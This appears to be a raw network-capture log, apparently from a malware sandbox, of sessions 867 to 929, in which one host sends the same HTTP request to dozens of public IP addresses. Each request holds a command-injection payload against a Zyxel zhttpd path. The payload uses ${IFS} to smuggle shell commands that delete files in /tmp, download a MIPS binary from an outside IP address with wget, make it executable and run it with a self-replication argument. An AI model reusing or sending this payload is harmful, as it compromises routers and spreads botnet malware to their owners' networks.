                                            Jan 14, 2024 15:50:27.212138891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            867192.168.2.2342450113.7.81.90443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212178946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            868192.168.2.2337466203.54.155.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212201118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            869192.168.2.2351886216.190.100.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212241888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            870192.168.2.2336366129.246.78.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212254047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            871192.168.2.23504988.13.163.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212261915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            872192.168.2.2356620163.82.222.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212301016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            873192.168.2.2353480212.30.144.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212327957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            874192.168.2.2356926168.135.246.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212356091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            875192.168.2.233928497.182.96.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212363005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            876192.168.2.2357116198.85.33.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212399960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            877192.168.2.234703697.46.0.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212435007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            878192.168.2.2356924223.5.35.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212475061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            879192.168.2.235362682.54.54.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212512970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            880192.168.2.2359704166.169.167.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212531090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            881192.168.2.2338618199.202.215.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212553978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            882192.168.2.233641043.10.221.236443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212569952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            883192.168.2.2348976166.43.173.75443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212585926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            884192.168.2.234931275.235.77.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212631941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            885192.168.2.2353540156.142.36.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212654114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            886192.168.2.234772245.55.248.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212683916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            887192.168.2.235860482.56.117.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212713957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            888192.168.2.2352506208.185.136.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212740898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            889192.168.2.233869889.197.249.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212758064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            890192.168.2.234942240.129.52.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212793112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            891192.168.2.234984868.46.9.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212811947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            892192.168.2.234762287.194.181.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212838888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            893192.168.2.235785820.72.236.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212852001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            894192.168.2.2340934163.213.216.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212905884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            895192.168.2.2341246110.202.2.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212928057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            896192.168.2.2349356223.63.74.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212964058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            897192.168.2.2333560105.228.165.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.212985039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            898192.168.2.235752832.218.10.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213010073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            899192.168.2.23442701.24.66.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213025093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            900192.168.2.2353228153.98.243.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213041067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            901192.168.2.2348904182.75.114.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213053942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            902192.168.2.235821097.5.219.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213084936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            903192.168.2.23440901.221.234.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213126898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            904192.168.2.2340906114.83.228.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213159084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            905192.168.2.2337008131.213.17.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213191032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            906192.168.2.2348862199.87.215.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213206053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            907192.168.2.234413271.44.214.94443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213227987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            908192.168.2.2350544124.66.227.66443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213251114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            909192.168.2.235972637.244.246.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213269949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            910192.168.2.2360148163.71.187.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213316917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            911192.168.2.23582521.28.22.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213342905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            912192.168.2.235580218.246.14.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213349104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            913192.168.2.233566893.84.181.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213381052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            914192.168.2.234355251.162.42.100443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213419914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            915192.168.2.2342398131.83.128.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213421106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            916192.168.2.234030477.12.17.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213437080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            917192.168.2.2350710175.227.253.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213464975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            918192.168.2.2334346117.12.122.85443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213521004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            919192.168.2.234550278.178.197.196443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213543892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            920192.168.2.2345326201.56.114.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213582039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            921192.168.2.2347406124.58.36.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213624954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            922192.168.2.2335766183.148.218.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213643074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            923192.168.2.235852263.196.201.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213671923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            924192.168.2.23456581.40.197.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213690042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            925192.168.2.2348662223.168.22.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213711023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            926192.168.2.235279273.105.87.139443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213749886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            927192.168.2.235718220.138.2.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213776112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            928192.168.2.2339322186.105.220.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:27.213790894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            929192.168.2.2343638135.107.138.190443
                                            TimestampBytes transferredDirectionData
